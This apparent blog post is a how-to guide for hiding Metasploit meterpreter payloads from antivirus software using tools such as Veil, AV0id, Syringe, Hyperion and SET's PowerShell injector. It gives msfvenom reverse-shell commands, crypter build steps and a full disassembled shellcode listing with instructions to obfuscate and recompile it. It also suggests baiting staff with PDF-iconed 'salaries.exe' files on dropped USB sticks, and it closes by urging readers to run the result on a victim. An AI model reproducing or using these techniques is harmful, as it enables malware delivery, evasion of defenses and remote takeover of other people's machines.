LIST OF DIFFERNET AV EVASION FRAMEWORKS.

Today we are gonna talk about different AV evasion frameworks for metasploit payload & how to use them? It`s very imporatant when you know which AV you have to bypass, because we don`t have to worry about FUD. Some payload can bypass specific AV ; while other AV can not be bypassed using that payload.

(1)Veil:-Image result for veil evasion

Veil is python based tool which create FUD payload , One of the best framework for AV evasion. On the 15th of every month, at least one new payload module will be released.

https://github.com/Veil-Framework/Veil-Evasion

(2)AV0id :-

avoid

Introducing a simple script I have created to bypass most Anti-Virus products. This script is based on scripts I used whilst attempted to avoid A.V,  credit to all authors of the mentioned scripts below for their research and work. This was just a very quick script I put together to make life a bit easier.

What it does it generator a Metasploit Meterpreter payload executable automatically for you. It auto changes the icon to a PDF and also auto creates AutoRun files. So you can then use this file via a shell upload to get a reverse shell via Metasploit, place on a USB stick for some social engineering/Phishing attacks, or burn to a CDROM for some AutoRun fun.

There are many good tools/scripts around, but a lot of these are now detected by most Anti-Virus products. On a recent laptop assessment I was getting blocked by McAfee attempting a AutoRun exploit and most tools and encoding would not get round this, so I decided to knock up a quite script that did get round it.

Even if you are not looking to get around A.V, or this gets detected more in the future it is a very easy script to generate you a quick Meterpreter payload for your local or remote listener.

Some screen shots, download path and A.V bypass script comparisons below. At its best my script was only detected by 10 out of 46 Anti-Virus products, these depends on which stealth option you use. At its lowest it was about 14/15 A.V products found this. This is still bypasses 20+ more products than just encoding the payload using Mfsencode or Msfvenom.

It uses Msfencode, but also pads the file and re-compiles the executable  including a PDF icon. The file size and contents are never the same for every executable generated,  this helps it avoid most Anti-Virus products. The more intelligent A.V products will still pick it up.


Download from the NCC Open Source GitHub Repository below:

https://github.com/nccgroup/metasploitavevasion

Tested on Backtrack 5 and Kali only. Run as root.

Exploit on victim now opens minimised, thanks to @redmeat_uk for the info.


av1

It requires two very small files in order to create the PDF icon and AutoRun files. It will auto download these if they are not within the directory. If it can’t download them it will continue, but it will not create the PDF icons.

av2

If you want to download these two files in advance, just get them below. Place in the same directory as the script is stored. If you want to change the autorun.ico for your own icon this will change the autorun icon. To change the exe icon is a little more complex and is compiled from the icon.res file. Google around and you can create this using windres.

wget http://www.commonexploits.com/tools/avoid/autorun.ico

MD5 checksum: ebe763172e90b7f218d522b13abbc5c1

wget http://www.commonexploits.com/tools/avoid/icon.res

MD5 checksum: 876caf8703c803d7a2359103adc9ce58

Select local system or remote. If you select local it will auto grab your local IP address and use that. If you select alternative, it will ask you which IP address to listen on, then give you the msf listener code to run at the end.

av3

Enter the port number to listen on. If local it doesn’t really matter, but if external they may have some restrictions so try port 80, 443 or 53. A recent test I found workstations could talk directly outbound on DNS/53, so I could get a AutoRun shell out to the internet.

av4

There are 5 options for the payload. The more stealthy the bigger the file. All this is doing is padding out with more random junk, which seems to reduce the detection ratio slightly. If size is not an issue i.e using a CD or USB then try the most stealthy option for better results. I have not tested option 5 on online scanners as it exceeds the upload limit.

av5

It then saves you out the executable named salaries.exe, you can change the name in the top of the script header. You could use this and place on a few USB sticks and leave around the building, I am sure curious staff may want to open, and as it has a PDF icon it helps. It also creates you an autorun directory, simply burn these to a CDROM to try a AutoRun shell or a U3 USB – normal USB sticks won’t AutoRun and obviously if the system has AutoRun disabled it will not work.

av6

 

avsal

 

autorun

It will then launch the listener locally.

av7

Or if you selected an alternative system, it will give you the code to copy and paste to start the listener.

av8

Then run the exploit and you will get your shell. In this case the AutoRun exploited without any user interaction.

av10

 

av9

 

I run this over 46 Anti-Virus products and got fairly good results. Below is a comparison I made with the most commonly known and used A.V avoidance tools and scripts.

 Standard Metasploit payload (encoded)

c1

Shell Code Exec

c2Vanish Script

c3

AV0ID

c4

Syringe

c5

Quick high level view on the above scripts.

Shell Code Exec

Great tool created by Bernardo Damele that did get round almost all A.V products. The shellcode exe now does get detected more as this file stays the same. Bernardo allows you to download the source code, so I believe a quick modification to the file and a recompile would get round this.

Info here: http://bernardodamele.blogspot.co.uk/2011/04/execute-metasploit-payloads-bypassing.html

Download here: https://github.com/inquisb/shellcodeexec

This is also built into SET (Social Engineering Toolkit) under the media generator options.

Vanish Script

Great script that inspired my script.  Created originally by Astr0baby in 2011 and modified by Vanish3r that generates the Metasploit payload for you. It is getting more detected now.

Download here: http://pastebin.com/7xmvGnks

Syringe

This works in a very similar way to Shellcode exec, but I found this to be very good and got round a lot of A.V products. This was the only tool that got around Microsoft A.V in my testing.

Download here: https://code.google.com/p/syringe-antivirus-bypass/

(3)Syringe:-

wget https://syringe-antivirus-bypass.googlecode.com/files/syringe%200.1.tar
tar xf syringe\ 0.1.tar
./syringe.sh
Antivirus-Evasion-Using-Syringe

As mention previously , change interface type in script if you are not using eth. Replace line 10 which is export interface=eth0 to export interface=ppp0.

AV-Reports-For-syringe-payload

(4)Shellcodeexec:-

git clone https://github.com/inquisb/shellcodeexec

we are gonna use downloaded shellcodexec in third step on victim machine.

xx.JPG

(3)C:\WINDOWS\Temp>shellcodeexec.exe <msfencode’s alphanumeric-encoded payload>

(5)Hypersion:-

Image result for Hyperion kali

Hyperion is a runtime encrypter for 32-bit portable executables.
wget http://nullsecurity.net/tools/binary/Hyperion-1.0.zip
unzip Hyperion-1.0.zip
cd Hyperion-1.0
wine /root/.wine/drive_c/MinGW/bin/g++.exe ./Src/Crypter/*.cpp -o crypter.exe
Now generate metasploit payload.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.128 LPORT=443 -f exe >payload.exe
wine crypter.exe payload.exe encrypted_payload.exe

 

(6)Crypter.Py:-

(7)Brute-Force AV Evasion :-

Genpayloads.py is script to generate lots of payloads , then scan folder for specific after that you have some binary left in folder which does not detected by specific AV.

https://raw.githubusercontent.com/obscuresec/random/master/GenPayloads.py

(8)Finding Simple AV Signatures With PowerShell :-

Awesome tutorial here to find AV signatures & then change specific bit which trigger AV . It only works with signature-based antivirus .

(9)Powershell:-

Social Engineering Toolkit: Bypassing Anti-Virus using Powershell

Just when it looked like Anti-Virus was getting the upper hand against the Social Engineering Toolkit…

At the Security Bsides conference in Cleveland, David Kennedy the author of SET, showed off some of the program’s new features. One is a very interesting way to get a remote shell by completely bypass Anti-Virus using a Windows Powershell attack. Let’s take a quick look at how this works.

  • Fire up SET and pick option number “1” Social Engineering Attacks
  • Select option “10” Powershell attack vector:

  • Next choose number 1, “Powershell Alphanumeric Shellcode Injector“:

Okay, now just enter the IP address of the Backtrack system and what port you want to use for the windows machine to connect in on. Usually the default, 443 is good enough. SET will now create the exploit code for 32 and 64 bit Windows:

Now that it is done, it gives you the option to start a listener. This sets up SET to receive incoming connections from Windows systems. For those familiar with Metasploit, this just starts the standard multi-handler for a reverse shell. Enter “yes” and pick if you want a 32 or 64 bit listener.

SET starts up Metasploit, runs the payload handler  and waits for an incoming connection:

All we need to do now is retrieve the Powershell code that SET created. The code is saved in SET’s Report/ Powershell directory

When you navigate to the directory, you will see both the 32 and 64 bit versions of the Powershell code. If a Windows system runs this code, a remote session will open up to the Backtrack machine. For this example, I will just copy the code:

and Paste it into a Windows 7 command prompt

Once you hit enter, a full remote shell session is created to the Backtrack SET machine:

Game over. The Windows 7 system in this instance was fully updated and had one of the best anti-virus/ internet security programs available. The AV didn’t see a thing.

Powershell is available on almost every Windows box nowadays, making this a very powerful attack. This is an amazing tool for pentesters, but as usual there are those who will try to use it for evil purposes.

Most likely, you would need to be tricked into running this for the attack to be successful. So as always, be very careful opening files and links from e-mails and social media messages. Run an internet browser script blocking program like “NoScript” to prevent code from automatically running from visited websites.

Also be very wary of shortened links, especially used on Twitter. Recently I saw a shortened link on Twitter that when unshrunk was a four line command to a malware server.

11)Ghost Writing ASM :-

1. Create malicious file(backdoor)
$ msfvenom windows/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=443 R > raw_binary
or
$ msfvenom --payload windows/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=443 -f raw > raw_binary

2. Copy metasm.rb (ruby library for disassemble file that normally ship with Metasploit ) to metasm folder of environment ruby folder.
$ cd /pentest/exploit/framework/lib/metasm
$ cp -a metasm.rb metasm /usr/lib/ruby/1.9.2

3. Disassemble it
$ ruby /pentest/exploit/framework/lib/metasm/samples/disassemble.rb raw_binary > asm_code.asm

That will create a file called asm_code.asm which should look something like this
 

entrypoint_0:
cld ; @0 fc
call sub_8fh ; @1 e889000000 x:sub_8fh
pushad ; @6 60
mov ebp, esp ; @7 89e5
xor edx, edx ; @9 31d2
mov edx, fs:[edx+30h] ; @0bh 648b5230 r4:segment_base_fs+30h
mov edx, [edx+0ch] ; @0fh 8b520c r4:unknown
mov edx, [edx+14h] ; @12h 8b5214 r4:unknown
// Xrefs: 8dh
loc_15h:
mov esi, [edx+28h] ; @15h 8b7228 r4:unknown
movzx ecx, word ptr [edx+26h] ; @18h 0fb74a26 r2:unknown
xor edi, edi ; @1ch 31ff
// Xrefs: 2ch
loc_1eh:
xor eax, eax ; @1eh 31c0
lodsb ; @20h ac
cmp al, 61h ; @21h 3c61
jl loc_27h ; @23h 7c02 x:loc_27h
sub al, 20h ; @25h 2c20
// Xrefs: 23h
loc_27h:
ror edi, 0dh ; @27h c1cf0d
add edi, eax ; @2ah 01c7
loop loc_1eh ; @2ch e2f0 x:loc_1eh
push edx ; @2eh 52
push edi ; @2fh 57
mov edx, [edx+10h] ; @30h 8b5210 r4:unknown
mov eax, [edx+3ch] ; @33h 8b423c
add eax, edx ; @36h 01d0
mov eax, [eax+78h] ; @38h 8b4078
test eax, eax ; @3bh 85c0
jz loc_89h ; @3dh 744a x:loc_89h
add eax, edx ; @3fh 01d0
push eax ; @41h 50
mov ecx, [eax+18h] ; @42h 8b4818
mov ebx, [eax+20h] ; @45h 8b5820
add ebx, edx ; @48h 01d3
// Xrefs: 66h
loc_4ah:
jecxz loc_88h ; @4ah e33c x:loc_88h
dec ecx ; @4ch 49
mov esi, [ebx+4*ecx] ; @4dh 8b348b
add esi, edx ; @50h 01d6
xor edi, edi ; @52h 31ff
// Xrefs: 5eh
loc_54h:
xor eax, eax ; @54h 31c0
lodsb ; @56h ac
ror edi, 0dh ; @57h c1cf0d
add edi, eax ; @5ah 01c7
cmp al, ah ; @5ch 38e0
jnz loc_54h ; @5eh 75f4 x:loc_54h
add edi, [ebp8] ; @60h 037df8
cmp edi, [ebp+24h] ; @63h 3b7d24
jnz loc_4ah ; @66h 75e2 x:loc_4ah
pop eax ; @68h 58
mov ebx, [eax+24h] ; @69h 8b5824
add ebx, edx ; @6ch 01d3
mov cx, [ebx+2*ecx] ; @6eh 668b0c4b
mov ebx, [eax+1ch] ; @72h 8b581c
add ebx, edx ; @75h 01d3
mov eax, [ebx+4*ecx] ; @77h 8b048b
add eax, edx ; @7ah 01d0
mov [esp+24h], eax ; @7ch 89442424
pop ebx ; @80h 5b
pop ebx ; @81h 5b
popad ; @82h 61
pop ecx ; @83h 59
pop edx ; @84h 5a
push ecx ; @85h 51
jmp eax ; @86h ffe0
// Xrefs: 4ah
loc_88h:
pop eax ; @88h 58
// Xrefs: 3dh
loc_89h:
pop edi ; @89h 5f
pop edx ; @8ah 5a
mov edx, [edx] ; @8bh 8b12 r4:unknown
jmp loc_15h ; @8dh eb86 x:loc_15h
// Xrefs: 1
sub_8fh:
// function binding: ebp -> dword ptr [esp], esp -> esp10h
// function ends at 0a0h
pop ebp ; @8fh 5d
push 3233h ; @90h 6833320000
push 5f327377h ; @95h 687773325f
push esp ; @9ah 54
push 726774ch ; @9bh 684c772607
call ebp ; @0a0h ffd5 endsub sub_8fh noreturn
db 0b8h, 90h, 1, 0, 0, 29h, 0c4h, “TPh)”, 80h, 6bh, 0 ; @0a2h
db 0ffh, 0d5h, “PPPP@P@Ph”, 0eah, 0fh, 0dfh, 0e0h, 0ffh ; @0b0h
db 0d5h, 97h, 6ah, 5, 68h, 0c0h, 0a8h, 1, 64h, 68h, 2, 0, 1, 0bbh, 89h, 0e6h ; @0c0h
db 6ah, 10h, “VWh”, 99h, 0a5h, 74h, 61h, 0ffh, 0d5h, 85h, 0c0h, 74h, 0ch, 0ffh ; @0d0h
db 4eh, 8, 75h, 0ech, 68h, 0f0h, 0b5h, 0a2h, 56h, 0ffh, 0d5h, 6ah, 0, 6ah, 4, 56h ; @0e0h
db 57h, 68h, 2, 0d9h, 0c8h, 5fh, 0ffh, 0d5h, 8bh, “6j@h”, 0, 10h, 0 ; @0f0h
db 0, 56h, 6ah, 0, 68h, 58h, 0a4h, 53h, 0e5h, 0ffh, 0d5h, 93h, 53h, 6ah, 0, 56h ; @100h
db “SWh”, 2, 0d9h, 0c8h, 5fh, 0ffh, 0d5h, 1, 0c3h, 29h, 0c6h, 85h, 0f6h, 75h ; @110h
db 0ech, 0c3h ; @120h

4. Now obfuscate it. From the Source.
For now, we’ll continue with the “spray and pray” methodology. You can add anything you want so long as you don’t break the functionality of the application. I find that simply pushing registers onto the stack and then popping them back off sometimes will do the trick. Also just before a XOR statement (which is often used to set the value of a register to zero) you can add a bunch of random statements to increment and decrement the register, move values of other registers into it. Anything you do won’t matter because eventually you will be changing the value to zero. So using the above example we can change the section beginning with ‘// Xrefs: 8dh’
mm.JPG

5. Add the following two lines to the top of the file for it to build correctly

.section ‘.text’ rwx
.entrypoint

6. Use metasm to build the executionable and package it into the format that windows can run.
$ /pentest/exploits/framework/lib/metasm/samples/peencode.rb asm_code.asm -o coolstuff.exe
7. Now check the file with
$ file coolstuff.exe

8. Run it in the victim with your social engineering skill. Have a nice hack :).

 

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s